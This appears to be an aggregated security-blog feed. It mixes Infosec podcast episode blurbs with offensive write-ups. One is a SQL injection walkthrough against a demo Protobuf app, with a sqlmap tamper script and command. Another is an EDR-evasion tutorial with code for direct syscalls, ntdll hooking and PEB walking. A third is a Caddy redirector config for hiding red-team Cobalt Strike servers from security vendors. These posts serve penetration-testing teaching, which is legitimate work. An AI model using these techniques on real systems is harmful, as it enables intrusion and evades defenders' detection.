
How to become a secure coder | Guest Chrys Thorsen

By: Infosec
18 October 2021 at 07:00

On today’s podcast Infosec Skills author Chrys Thorsen talks about founding IT Without Borders, a humanitarian organization built to empower underserved communities through capacity building in information and communications technology (ICT) skills and information access. She’s also a consultant and educator. And, for our purposes, she is the author of several learning paths on our Infosec Skills platform. She has written course paths for Writing Secure Code in Android and Writing Secure Code in iOS, as well as a forthcoming CertNexus Cyber Secure Coder path.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro
2:43 - Thorsen’s origin story in cybersecurity 
4:53 - Gaining about 40 certifications
6:20 - Cross certification knowledge
7:25 - Great certification combos 
8:45 - How useful are certifications?
11:12 - Collecting certifications
13:01 - Changing training landscape
14:20 - How teaching changed
16:36 - In-demand cybersecurity skills
17:48 - What is secure coding?
19:34 - Secure coders versus coders 
20:31 - Secure coding in iOS versus Android 
22:39 - CertNexus secure coder certification
24:13 - Secure coding before coding 
24:42 - Secure coding curriculum 
26:27 - Recommended studies post secure coding
26:50 - Benefits to skills-based education
27:43 - Tips for lifelong learning
29:29 - Cybersecurity education’s future 
30:54 - IT Without Borders
33:38 - Outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


How to learn web application security | Guest Ted Harrington

By: Infosec
25 October 2021 at 07:00

On today’s podcast, Infosec Skills author Ted Harrington talks about authoring a recent Infosec Skills learning path, “How To Do Application Security Right,” which is also the subtitle of his recent book, “Hackable: How To Do Application Security Right.” Harrington shares his application security (AppSec) expertise, the benefits of skills-based learning, and what it was like to hack the iPhone.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:00 - Hacking the iPhone 
8:30 - IoT security 
14:00 - “Hackable” book 
17:14 - Using the book as a roadmap
18:42 - Most important skills right now
21:45 - Taking Harrington’s class
24:40 - Demystifying application security
26:48 - Career opportunities
28:26 - Roadblocks in application security
30:55 - Education tips for application security
33:40 - Benefits of skills-based education
37:21 - The skills gap and hiring process
41:19 - Tips for lifelong learners
43:43 - Harrington’s next projects
44:33 - Cybersecurity education’s future
45:38 - Connect with Harrington 
46:50 - Outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


🇬🇧 Tortellini in Brodobuf

brodobuf

TL;DR

Many developers believe that serializing traffic makes a web application faster, as well as more secure. Easy, right? The truth is that the security implications remain if the backend code does not adopt adequate defensive measures, regardless of how data is exchanged between client and server. In this article we will show how serialization can’t stop an attacker if the web application is vulnerable at the root. During one of our engagements the application was vulnerable to SQL injection; we will show how to exploit it when communications are serialized with Protocol Buffers, and how to write a SQLMap tamper script for it.

Introduction

Hello friends… Hello friends… Here are 0blio and MrSaighnal. We didn’t want to leave all the space to our brother last, so we decided to do some hacking of our own. During an engagement on a web application we tripped over some weird target behavior: during HTTP interception the data appeared to be base64 encoded, but after decoding the response we noticed it was in a binary format. Thanks to some information leakage (and also by taking a look at the application/grpc header) we understood the application used a Protocol Buffers (Protobuf) implementation. Looking around the internet we found little information regarding Protobuf and its exploitation methodology, so we decided to document our analysis process here. The penetration testing activity was under NDA, so in order to demonstrate the functionality of Protobuf we developed an exploitable web application (APTortellini copyrighted 😊).

Protobuf primer

Protobuf is a data serialization format released by Google in 2008. Unlike formats such as JSON and XML, Protobuf is not human friendly, since data is serialized into a binary format and sometimes encoded in base64. Protobuf was developed to improve communication speed, notably when used in conjunction with gRPC (more on that in a moment). It is a data exchange format originally developed for internal use and later released as an open-source project (partially under the Apache 2.0 license). Protobuf can be used by applications written in various programming languages, such as C#, C++, Go, Objective-C, JavaScript, Java, etc. It is used, among other things, in combination with HTTP and RPC (Remote Procedure Calls) for local and remote client-server communication, in particular for the description of the interfaces needed for this purpose. The resulting protocol suite is commonly known as gRPC.

For more information regarding Protobuf our best advice is to read the official documentation.

Step 1 - Playing with Protobuf: Decoding

Okay, so… our application comes with a simple search form that allows searching for products within the database.

brodobuf0

Searching for “tortellini”, we obviously get that the amount is 1337 (badoom tsss):

brodobuf1

Inspecting the traffic with Burp we notice how search queries are sent towards the /search endpoint of the application:

request0

And that the response looks like this:

request1

At first glance, it might seem that the messages are simply base64 encoded. Trying to decode them, though, we noticed that the traffic is in a binary format:

term0

elliot0

Inspecting it with xxd we can get a bit more information.

term1

To make it easier for us to decode base64 and deserialize Protobuf, we wrote this simple script:

#!/usr/bin/python3

import base64
from subprocess import run, PIPE

while 1:
    try:
        decoded_bytes = base64.b64decode(input("Insert string: "))[5:]
        process = run(['protoc', '--decode_raw'], stdout=PIPE, input=decoded_bytes)

        print("\n\033[94mResult:\033[0m")
        print (str(process.stdout.decode("utf-8").strip()))
    except KeyboardInterrupt:
        break

The script takes an encoded string as input, decodes it from base64, strips away the first 5 bytes (the gRPC length-prefix framing: a 1-byte compression flag followed by a 4-byte big-endian message length, which you can also see being rebuilt in the encoding script below), and finally uses protoc (Protobuf’s own compiler/decompiler) to deserialize the message.

Running the script on both our request data and the returned response data, we get the following output:

term2

As we can see, the request message contains two fields:

  • Field 1: the string to be searched within the database.
  • Field 2: an integer always equal to 0.

The response structure, instead, includes a series of messages containing the objects found and their respective amounts.

Once we understood the structure of the messages and their content, the challenge was to write a definition file (.proto) that would let us produce the same kind of output.

Step 2 - Suffering with Protobuf: Encoding

After spending some time reading the Python documentation, and after some trial and error, we reconstructed a message definition similar to the one our target application presumably uses.

syntax = "proto2";
package searchAPI;

message Product {

        message Prod {
                required string name = 1;
                optional int32 quantity = 2;
        }

        repeated Prod product = 1;
}

The .proto file can be compiled with the following command:

protoc -I=. --python_out=. ./search.proto

As a result we got a library to import in our code to serialize/deserialize our messages, which you can see in the import of the script (import search_pb2).

#!/usr/bin/python3

import struct
from base64 import b64encode
import search_pb2

def encode(array):
    """
    Function to serialize an array of tuples
    """
    products = search_pb2.Product()
    for tup in array:
        p = products.product.add()
        p.name = str(tup[0])
        p.quantity = int(tup[1])

    serializedString = products.SerializeToString()
    serializedString = b64encode(b'\x00' + struct.pack(">I", len(serializedString)) + serializedString).decode("utf-8")

    return serializedString

test = encode([('tortellini', 0)])
print (test)

The output for the string “tortellini” is the same as the one in our browser request, demonstrating that the encoding process worked properly.

term3

Step 3 - Discovering the injection

To discover the SQL injection vulnerability we opted for manual inspection. We decided to send a single quote (') in order to induce a server error. Analyzing the web application endpoint:

http://brodostore/search/PAYLOAD

we could guess that the underlying SQL query is something similar to:

SELECT id, product, amount FROM products WHERE product LIKE '%PAYLOAD%';

This means that by injecting a single quote within the request we could induce the server to process a malformed query:

SELECT id, product, amount FROM products WHERE product LIKE '%'%';

which then produces a 500 server error. To check this manually we had to serialize our payload with the Protobuf compiler and encode it in base64 before sending it. We reused the script from Step 2, modifying the following line:

test = encode([("'", 0)])

After running the script we can see the following output:

term4

By sending the generated serialized string as payload to the vulnerable endpoint:

request2

the application returns an HTTP 500 error, indicating that the query was broken:

request3

Since we wanted to automate the dumping process, sqlmap was a good candidate for the task thanks to its tamper scripting feature.

Step 4 - Coding the tamper

Once we understood the behaviour of the Protobuf encoding process, coding a sqlmap tamper was a piece of cake.

#!/usr/bin/env python

from lib.core.data import kb
from lib.core.enums import PRIORITY

import base64
import struct
import search_pb2

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        # Instantiating objects
        products = search_pb2.Product()
        
        p = products.product.add()
        p.name = payload
        p.quantity = 1

        # Serializing the string
        serializedString = products.SerializeToString()
        serializedString = b'\x00' + struct.pack(">I",len(serializedString)) + serializedString

        # Encoding the serialized string in base64
        b64serialized = base64.b64encode(serializedString).decode("utf-8")
        retVal = b64serialized

    return retVal

To make it work we moved the tamper into the sqlmap tamper directory /usr/share/sqlmap/tamper/, along with the compiled Protobuf library.

Here is the logic behind the tamper’s inner workings:

logic0

Step 5 - Exploiting Protobuf - Control is an illusion

We intercepted the HTTP request and added an asterisk (*) to tell sqlmap where to inject the code.

GET /search/* HTTP/1.1
Host: brodostore
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

anon0

After saving the request to the test.txt file, we ran sqlmap with the following command:

sqlmap -r test.txt --tamper brodobug --technique=BT --level=5 --risk=3

sqlmap0

Why is it slow?

Unfortunately sqlmap is not able to understand the Protobuf-encoded responses, so we decided to take the path of boolean-based blind SQL injection. In other words, we had to “bruteforce” the value of every character of every string we wanted to dump, using the different responses the application returns when the SQLi succeeds. This approach is really slow compared to other SQL injection techniques, but for this test case it was enough to demonstrate how to exploit web applications that implement Protobuf. In the future, between one plate of tortellini and another, we might implement a mechanism that decodes the responses via the *.proto struct and then expand it to other attack paths… but for now we are satisfied with that! Until next time folks!

Cybersecurity collaboration, team building and working as CEO | Guest Wendy Thomas

By: Infosec
1 November 2021 at 07:00

On today’s podcast, Secureworks president and CEO Wendy Thomas talks about the company’s drive to provide innovative, best-in-class security solutions that sit at the heart of customers’ security operations. Thomas brings over 25 years of experience in strategic and functional leadership roles, including work as a chief financial officer, chief product officer and VP of strategy. She has worked across multiple technology-driven companies and has a wealth of knowledge.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro
3:18 - Wendy’s origin in cybersecurity
5:13 - Climbing the career ladder
8:10 - Average day as CEO
10:38 - Collaboration in cybersecurity
13:07 - Roadblocks in collaboration 
15:03 - Strategies to encourage collaboration
17:53 - Is there collaboration now? 
19:30 - Solving technology security gaps
21:35 - Limiting incident response noise
23:10 - Addressing the skills shortage
25:07 - Women in cybersecurity
30:45 - Developing your team
32:53 - Advice for those entering cybersecurity
34:18 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


This is how I bypassed almost every EDR!

By: Omri Baso
5 November 2021 at 16:58

First of all, let me introduce myself: my name is Omri Baso, I’m 24 years old, from Israel, and I’m a red teamer and security researcher. Today I will walk you through my learning experience with EDRs and low-level programming over the last 3 months.

1. Windows API Hooking

One of the major techniques EDRs use in order to detect and flag malicious processes on Windows is ntdll.dll API hooking. What does that mean? It means that the EDR’s injected DLL overwrites the first opcodes of an API so that the program’s execution flow is redirected into the EDR’s own functions. For example, when reading a file on Windows you will probably end up in NtReadFile; when your CPU reads the memory of ntdll.dll and reaches the NtReadFile function, it gets a little surprise telling it to “jump” to another function right as it enters the original ntdll function. The EDR then analyzes what your process is trying to read by inspecting the parameters sent to NtReadFile, and if everything looks valid, the execution flow goes back to the original NtReadFile function.

1.1 Windows API Hooking bypass

First of all, I am sure that there are people smarter than me who invented other techniques, but now I will teach you the one that worked for me.

Direct System Calls:

Direct system calls are basically a way to invoke the kernel services behind the Windows user-mode APIs yourself, either using assembly or by accessing a manually loaded ntdll.dll (manual DLL mapping). In this article, I will NOT be teaching how to manually map a DLL.

The method we are going to use is assembly compiled into our binary, which will act as the Windows API.

The Windows syscall stubs are pretty simple; here is a small example of NtCreateFile:

First line: moves the syscall number into the rax register.
Second line: moves the rcx register into r10; since the syscall instruction destroys rcx, r10 is used to preserve the arguments being passed to the syscall function.
Third line: pretty self explanatory, executes the syscall instruction with the syscall number saved in the rax register.
Fourth line: ret, returns the execution flow back to the place the syscall function was called from.

Now that we know how to manually invoke system calls, how do we define them in our program? Simple: we declare them in a header file.

The example above shows the parameters being passed into NtCreateFile when it is called. As you can tell, I placed the EXTERN_C symbol before the function declaration in order to tell the linker that the function is implemented elsewhere.
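
As a rough sketch of what such a declaration might look like (the original post shows it only as a screenshot, so the stub name SysNtCreateFile and the use of winternl.h types here are our assumptions):

#include <windows.h>
#include <winternl.h>

// Declaration of the MASM stub so C/C++ code can call it. EXTERN_C prevents
// C++ name mangling, letting the linker match the assembly symbol.
EXTERN_C NTSTATUS SysNtCreateFile(
    PHANDLE FileHandle, ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock,
    PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess,
    ULONG CreateDisposition, ULONG CreateOptions,
    PVOID EaBuffer, ULONG EaLength);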

Before compiling our executable we have to take the following steps: right-click on our project and perform the following.

Now enable MASM (Build Dependencies -> Build Customizations -> masm):

Now we must set our .asm file’s Item Type to Microsoft Macro Assembler.

With all of that out of the way, we include our header file in our main.cpp file and now we can use NtCreateFile directly! Amazing: with what we just did, EDRs will not be able to see, through their user-mode hooks, the actions we perform via the NtCreateFile function we created.

What if I don’t know how to invoke the NtAPI?

Well… to be honest, I did encounter this. My solution was simple: I did the same thing we just did for NtCreateFile, but for NtCreateUserProcess. BUT, I hooked the original NtCreateUserProcess with my own hook, and when it was called I redirected the execution flow back to my assembly function with all the parameters that were generated by CreateProcessW, which is pretty well documented and easy to use. This way I avoided EDRs inspecting what I do when I use the NtCreateUserProcess syscall.

How can I hook APIs myself?

This is pretty simple as well; for that you need the following syscalls:

NtReadVirtualMemory, NtWriteVirtualMemory and NtProtectVirtualMemory. With these syscalls combined we can install hooks into our process silently, without the EDR noticing our actions. Since I already explained how to invoke syscalls, I will leave you to research a little bit with Google on how to identify the right syscall numbers ;-) For now, I will just show an example of an x64 hook on ntdll.dll!NtReadFile.

In the above example we can see the opcodes for mov rax, <Hooking function>; jmp rax.

These opcodes are written to the start of NtReadFile, which means that when our program tries to use NtReadFile it will be forced to jump to our arbitrary function.

It is important to note that, since ntdll.dll by default has only read and execute permissions, we must also add a write permission to that section of memory in order to write our hook there.
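
As a minimal sketch of the installation itself (not the post’s original code; for brevity it uses VirtualProtect, memcpy and GetProcAddress, which in the spirit of this article you would replace with the NtProtectVirtualMemory/NtWriteVirtualMemory syscall stubs and the PEB technique from section 2):

#include <windows.h>
#include <cstdint>
#include <cstring>

// Illustrative hook: simply fail the call. A real hook would inspect the
// arguments and then transfer execution to a clean copy of the original stub.
extern "C" LONG NTAPI MyNtReadFile() {
    return (LONG)0xC0000022; // STATUS_ACCESS_DENIED
}

// Overwrite the first 12 bytes of the target with "mov rax, <hook>; jmp rax".
void InstallHook(void* target, void* hook) {
    uint8_t stub[12] = { 0x48, 0xB8, 0, 0, 0, 0, 0, 0, 0, 0, 0xFF, 0xE0 };
    memcpy(stub + 2, &hook, sizeof(hook)); // patch in the hook address

    DWORD oldProtect; // ntdll is mapped read+execute, so make the page writable first
    VirtualProtect(target, sizeof(stub), PAGE_EXECUTE_READWRITE, &oldProtect);
    memcpy(target, stub, sizeof(stub));
    VirtualProtect(target, sizeof(stub), oldProtect, &oldProtect);
    FlushInstructionCache(GetCurrentProcess(), target, sizeof(stub));
}

int main() {
    void* ntReadFile = (void*)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtReadFile");
    InstallHook(ntReadFile, (void*)MyNtReadFile);
}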

1.2 Windows API Hooking bypass — making our code portable

In order to keep our code portable, we must match our code to any Windows OS build… and even though that sounds hard, it is really not that difficult.

In this section, I will show you POC code to get the Windows OS build number. Use it with caution, and improve the code later on, after finishing the article, by combining everything you have learned here (if you finish the article you will have the tools in mind to do so).

The Windows build number is stored under the SOFTWARE\Microsoft\Windows NT\CurrentVersion registry key. Using this knowledge, we will extract its value from the registry and store it in a static global variable.

After that we also need to create a global static variable that stores the last syscall that was called; this variable has to be updated each time we invoke a syscall. This gives us the following code.

In order to dynamically get the syscall number, we need to somehow get it to end up in the RAX register; for that we will create the following function.

As you can see in the example above, our function has a map dictionary whose keys and values are based on the build number, and it returns the right syscall number for the currently running Windows OS build.
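
Since the original code appears only in screenshots, here is a minimal reconstruction of the idea; the value name CurrentBuildNumber (a REG_SZ) is where Windows stores the build, while the syscall numbers in the table below are placeholders you would fill in for every build you support:

#include <windows.h>
#include <cstdlib>
#include <map>
#include <string>
#pragma comment(lib, "advapi32.lib")

// Read the OS build number ("19044", "22000", ...) from the registry once.
static DWORD ReadBuildNumber() {
    char buf[16] = { 0 };
    DWORD size = sizeof(buf);
    RegGetValueA(HKEY_LOCAL_MACHINE,
                 "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
                 "CurrentBuildNumber", RRF_RT_REG_SZ, nullptr, buf, &size);
    return (DWORD)atoi(buf);
}

static DWORD g_BuildNumber = ReadBuildNumber();
static std::string g_LastSyscall; // updated before each syscall stub is invoked

// Called from the assembly stub with "call GetBuildNumber": the return value
// lands in RAX, which is exactly where the syscall number needs to be.
extern "C" DWORD GetBuildNumber() {
    static const std::map<std::pair<std::string, DWORD>, DWORD> table = {
        { { "NtCreateFile", 19044 }, 0x55 }, // placeholder syscall numbers
        { { "NtCreateFile", 22000 }, 0x55 },
    };
    auto it = table.find({ g_LastSyscall, g_BuildNumber });
    return it != table.end() ? it->second : 0;
}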

But how is the return value going to end up in the RAX register dynamically?

Well, the return value of every function is stored in the RAX register when it returns, which means that if you execute the assembly instruction call GetBuildNumber, the return value of the function will be stored in the RAX register, resulting in our wanted scenario.

BUT wait, it is not that easy; assembly can be annoying sometimes. Each time we invoke a function call from inside another function, the second function will run over the rcx, rdx, r8 and r9 registers, resulting in the loss of the parameters that were sent to the first function. Therefore we need to store the previous values on the stack and restore them after GetBuildNumber finishes; this can be achieved with the following code.

As you can see, again we tell the linker that GetBuildNumber is an external function, since it lives within our CPP code.

2. Imported native APIs — PEB and TEB explained.

Well, if you think using direct syscalls will solve everything for you, you are a little bit mistaken. EDRs can also see which native Windows APIs you are using, such as GetModuleHandleW, GetProcAddress and more. In order to overcome this issue we first MUST understand how to get these functions’ functionality without calling them directly, and here the PEB comes to our aid. The PEB is the Process Environment Block, which is referenced from the TEB, the Thread Environment Block; on x64 systems the pointer to the PEB is always located at offset 0x060 within the TEB.

In the Windows OS, the TEB address is always stored in the GS register (on x64), therefore we can easily find the PEB pointer at the offset gs:[60h].

Let us follow the next screenshots in order to see with our own eyes how these offsets can be calculated.

This can be inspected in WinDbg using the command dt ntdll!_TEB

As we can see in the following screenshot, at offset 0x060 we find the PEB structure. Going further down in our investigation, we can find the Ldr inside the PEB using the command dt ntdll!_PEB

In the screenshot above we can see that the Ldr is located at offset 0x018. The PEB_LDR_DATA structure contains further elements that store information about the loaded DLLs; let’s continue our exploration.

Going down further we see that at offset 0x010 we find the list of modules (DLLs) which have been loaded. Using all of that knowledge we can now write C++ code to get the base address of ntdll WITHOUT using GetModuleHandleW; but first, we must know what we are looking for in that list.

In the screenshot above we can see that we are interested in two elements of the _LDR_DATA_TABLE_ENTRY structure: BaseDllName and DllBase. DllBase holds a void pointer to the DLL’s base address, and BaseDllName is a UNICODE_STRING structure, which means that in order to read what is inside the UNICODE_STRING we will need to access its Buffer value.

This can also simply be examined by looking at the UNICODE_STRING typedef on MSDN.
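
For reference, the typedef is:

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;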

Using everything we have learned so far, we will create and use the following code in order to obtain a handle on ntdll.dll.
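
The original code is shown as a screenshot; a minimal sketch of the same technique, using only the public winternl.h definitions, might look like this (we match on FullDllName because BaseDllName is an opaque Reserved field in the public header):

#include <windows.h>
#include <winternl.h>
#include <intrin.h>
#include <wchar.h>

// Resolve ntdll.dll's base address by walking the PEB loader list,
// without calling GetModuleHandleW.
PVOID GetNtdllBase() {
    PPEB peb = (PPEB)__readgsqword(0x60); // gs:[60h] -> PEB on x64
    PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;
    for (PLIST_ENTRY cur = head->Flink; cur != head; cur = cur->Flink) {
        PLDR_DATA_TABLE_ENTRY entry =
            CONTAINING_RECORD(cur, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        if (entry->FullDllName.Buffer &&
            wcsstr(entry->FullDllName.Buffer, L"ntdll.dll"))
            return entry->DllBase;
    }
    return nullptr;
}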

After we gain a handle on our desired DLL, ntdll.dll, we must find the offsets of its exported APIs (NtReadFile etc.). This can be achieved by parsing the PE image headers at the DllBase address and walking the export directory, which can be done with the following code.
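
Again as a sketch rather than the post’s original code, a minimal manual GetProcAddress that walks the export directory could look like this (forwarded exports are not handled):

#include <windows.h>
#include <cstring>

// Walk the export directory of a loaded module and resolve a function by name.
FARPROC GetExportByName(PVOID moduleBase, const char* name) {
    BYTE* base = (BYTE*)moduleBase;
    IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
    IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
    IMAGE_DATA_DIRECTORY dir =
        nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    IMAGE_EXPORT_DIRECTORY* exp =
        (IMAGE_EXPORT_DIRECTORY*)(base + dir.VirtualAddress);

    DWORD* names = (DWORD*)(base + exp->AddressOfNames);
    WORD* ordinals = (WORD*)(base + exp->AddressOfNameOrdinals);
    DWORD* functions = (DWORD*)(base + exp->AddressOfFunctions);

    for (DWORD i = 0; i < exp->NumberOfNames; i++) {
        if (strcmp((const char*)(base + names[i]), name) == 0)
            return (FARPROC)(base + functions[ordinals[i]]);
    }
    return nullptr;
}

Combined with the PEB walk above, GetExportByName(GetNtdllBase(), "NtReadFile") resolves the export without ever touching GetModuleHandleW or GetProcAddress.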

After we got our functions ready, let’s do a little POC to see that we can actually get a handle on a DLL and find exported functions inside it.

Using the simple program we made above, we can see that we obtained a handle on ntdll.dll and found functions inside it successfully!

3. Summing things up

So, we learned how to manually get a handle on a loaded module and use its functions, we learned how to hook Windows syscalls, and we learned how to write our own syscalls using assembly.

Combining all of our knowledge, we can now practically do everything we want under the radar, evading the EDR’s big eyes. We can even install hooks on ntdll.dll using the PEB, without GetModuleHandleW and without any native Windows API such as WriteProcessMemory, since we can execute the same actions using our own assembly. I will now leave you to modify the hooking code I showed you before with the PEB trick we learned in this article ;-)

And that, my friends, is how I bypassed almost every EDR.

How to become a great cybersecurity leader and manager | Guest Cicero Chimbanda

By: Infosec
8 November 2021 at 08:00

On today’s podcast, Cicero Chimbanda, Infosec Skills author and lecturer, discusses his cybersecurity leadership and management courses. We discuss the many paths of a cybersecurity leadership role, the soft skills that separate a good information security manager from a great one and why a baseline of cybersecurity knowledge can enhance any job, even if you don’t plan to pivot into the industry.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:37 - Getting into cybersecurity 
6:43 - First learning cybersecurity
7:54 - Skills needed to move up 
10:41 - CISM certification
13:00 - Two tracks of technology
15:13 - Are certifications important?
18:50 - Work as a college lecturer 
22:43 - Important cybersecurity soft skills
27:40 - Cybersecurity leadership and management 
32:33 - Where to go after security leadership 
35:26 - Soft skills for cybersecurity managers
37:23 - Benefits to skills-based education
39:40 - Tips for lifelong learning
43:46 - Cybersecurity education’s future
45:21 - Outro  

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


How to become a cyber threat researcher | Guest John Bambenek

By: Infosec
15 November 2021 at 08:00

On today’s podcast, John Bambenek of Netenrich and Bambenek Consulting talks about threat research, intelligence analytics, why the same security problems are so evergreen and the importance of pitching in a little extra bit of your time and talents to make the world a bit better than you found it.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
2:45 - Getting into cybersecurity 
9:40 - Threat researcher versus security researcher and threat analyst
12:05 - How to get into a research or analyst role
16:32 - Unusual types of malware
19:03 - An ideal work day
23:06 - Current main threat actors
28:50 - What cybersecurity isn’t addressing
31:38 - Where can I volunteer?
36:02 - Skills needed for threat researchers
40:53 - Adjacent careers to threat research
45:11 - Threat research in five years
48:55 - Bambenek Consulting 
49:35 - Learn more about Bambenek
50:26 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


TPM sniffing

15 November 2021 at 13:37
TL;DR: we reproduced Denis Andzakovic’s proof-of-concept showing that it is possible to read and write data from a BitLocker-protected device (for instance, a stolen laptop) by sniffing the TPM key from the LPC bus. Authors: Thomas Dewaele & Julien Oberson. Special thanks to Denis Andzakovic for his proof-of-concept and Joe Grand (@joegrand) for his hardware hacking …

How to disrupt ransomware and cybercrime groups | Guest Adam Flatley

By: Infosec
22 November 2021 at 08:00

On today’s podcast, Adam Flatley of Redacted talks about 14 years spent with the NSA and working in global intelligence. He also delineates the process of disrupting ransomware and cybercrime groups by dismantling organizations, applying pressure and making the crime of ransomware more trouble than it’s worth!

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:13 - Getting into cybersecurity 
4:27 - Why work for the DoD?
6:37 - Average work day in threat intelligence
9:28 - Main security threats today
11:53 - Issues cybersecurity is ignoring
16:12 - Disrupting ransomware offensively 
23:00 - How to handle ransomware 
25:07 - How do I fight cybercriminals 
27:15 - How to convey self learning on a resume
28:24 - Security recommendations for your company 
31:40 - Logistics of changing security 
34:40 - Cybercrime in five years
36:57 - Learn about Redacted
39:18 - Learn more about Adam
40:00 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


🇬🇧 Carrying the Tortellini’s golf sticks

Giving Caddy redirectors some love

tortellinicaddy

The consultant’s life is a difficult one: new business, new setups, and sometimes you have to do everything in a hurry. We are not a top-notch security company with a fully automated infra. We are poor rookies, always learning from the best.

We started by reading several blog posts that can be found on the net, written by people much more experienced than us, and realized that redirectors are almost always based on Apache or nginx, which are great solutions! But we wanted to explore other territories…

just to name a few:

and many others…

Despite the posts mentioned above being seriously top-notch, we decided to take inspiration from our fellow countryman Marcello, aka byt3bl33d3r, who came to the rescue!

As you can see from his post, Marcello makes a quick configuration available to us mere mortals, which prompted us to dig deeper into the topic.

Why Caddy Server?

Caddy was born as an open-source web server specifically created to be easy to use and secure. It is written in Go and runs on almost every platform.

The added value of Caddy is its automatic certificate management, which generates and renews certificates through Let’s Encrypt with basically no effort at all.

Another important factor is the configuration side, which is very easy to understand and more minimalist: just what we need!

Let’s Configure!

1

Do you remember byt3bl33d3r’s post mentioned just above? (Of course, you wrote it 4 lines higher…) Let’s take a cue from it!

First of all let’s install Caddy Server with the following commands:

(We are installing it on an AWS EC2 instance)

sudo yum update
yum install yum-plugin-copr
yum copr enable @caddy/caddy
yum install caddy

Once installed, let’s go under /opt and create a folder named caddy (or whatever you like).

Inside it, create the Caddyfile.

At this point let’s populate the /caddy folder with our own Caddyfile and the relative folder structure and configurations.

To make things clearer, here we have a tree of the structure we are going to implement:

  1. The actual Caddyfile
  2. The filters folder, which will contain our countermeasures and defensive mechanisms ( wtf are you talking about there is a bunch of crap inside here)
  3. the sites folder, which will contain the domains for our red team operation and relative logfiles
  4. the upstreams folder, which will contain the entire upstreams part
  5. the www folder, which will contain the sites, in case we want to farm a categorization for our domains, like hosting a custom index.html or simply cloning an existing one because we are terrible individuals.
.
├── Caddyfile
├── filters
│   ├── allow_ips.caddy
│   ├── bad_ips.caddy
│   ├── bad_ua.caddy
│   └── headers_standard.caddy
├── sites
│   ├── cdn.aptortellini.cloud.caddy
│   └── logs
│       └── cdn.aptortellini.cloud.log 
├── upstreams
│   ├── cobalt_proxy_upstreams.caddy
│   └── reverse_proxy
│       └── cobalt.caddy
└── www
    └── cdn.aptortellini.cloud
        └── index.html

CADDYFILE

This is the default configuration file for Caddy

# These are the default ports, which instruct Caddy to respond when no other configuration matches
:80, :443 {
	# Default security headers and custom header to mislead fingerprinting
    header {
        import filters/headers_standard.caddy
    }
	# Just respond "OK" in the body and put the http status code 200 (change this as you desire)
    respond "OK" 200
}

#Import all upstreams configuration files (only with .caddy extension)
import upstreams/*.caddy

#Import all sites configuration files (only with .caddy extension)
import sites/*.caddy

2

We decided to keep the Caddyfile as clean as possible, spending some more time structuring and modularizing the .caddy files.

FILTERS folder

This folder contains all the basic filtering configuration for the web server, for example:

  • a list of IPs to block
  • a list of User Agents (UA) to block
  • the default implementation of security headers

bad_ips.caddy

remote_ip mal.ici.ous.ips

A still-incomplete but usable list we crafted can be found here: https://github.com/her0ness/av-edr-urls/blob/main/AV-EDR-Netblocks

bad_ua.caddy

This will block all the User-Agents we don’t want visiting our domain.

header User-Agent curl*
